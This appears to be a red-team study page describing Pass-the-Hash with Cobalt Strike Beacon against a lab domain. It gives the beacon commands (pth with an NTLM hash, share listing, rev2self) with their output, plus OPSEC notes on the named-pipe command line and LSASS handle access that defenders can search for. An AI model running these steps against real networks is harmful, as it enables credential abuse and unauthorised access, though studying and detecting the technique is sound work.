Pass The Hash (PTH)
Pass The Hash
Note: Requires Elevated Privileges
Cobalt Strike
Beacon has a built-in pth command that runs mimikatz in the background.
We'll first attempt to access resources we don't have permission to
beacon> getuid
[*] You are DEV\sam (admin)
beacon> ls \\internal-website.rotta.dev\c$
[-] could not open \\internal-website.rotta.dev\c$\*: 5 - ERROR_ACCESS_DENIEDExecute PTH with NTLM hash
We can execute Pass-The-Hash like so:
beacon> pth DEV\robert 2B576ACBE6BCFDA7294D6BD18041B8FE
...List resources as impersonated user
beacon> ls \\internal-website.rotta.dev\c$
[*] Listing: \\internal-website.rotta.dev\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2024 11:30:11 $Recycle.Bin
dir 08/10/2024 11:45:28 $WinREAgentDrop Impersonation
Use rev2self to drop impersonation.
beacon> rev2self
[*] Tasked beacon to revert tokenOPSEC
When running the pth command, a named pipe command is run that looks like:
program : C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08Note: This can be found via the "Suspicious Named Pipe Impersonation" search, which queries process events where the arguments contain "echo", ">" and "\.\pipe".
Note: Mimikatz also opens a suspicious handle to LSASS.
PROCESS_QUERY_LIMITED_INFORMATION (0x1000), PROCESS_VM_WRITE (0x0020), PROCESS_VM_READ (0x0010) and PROCESS_VM_OPERATION (0x0008).
Last updated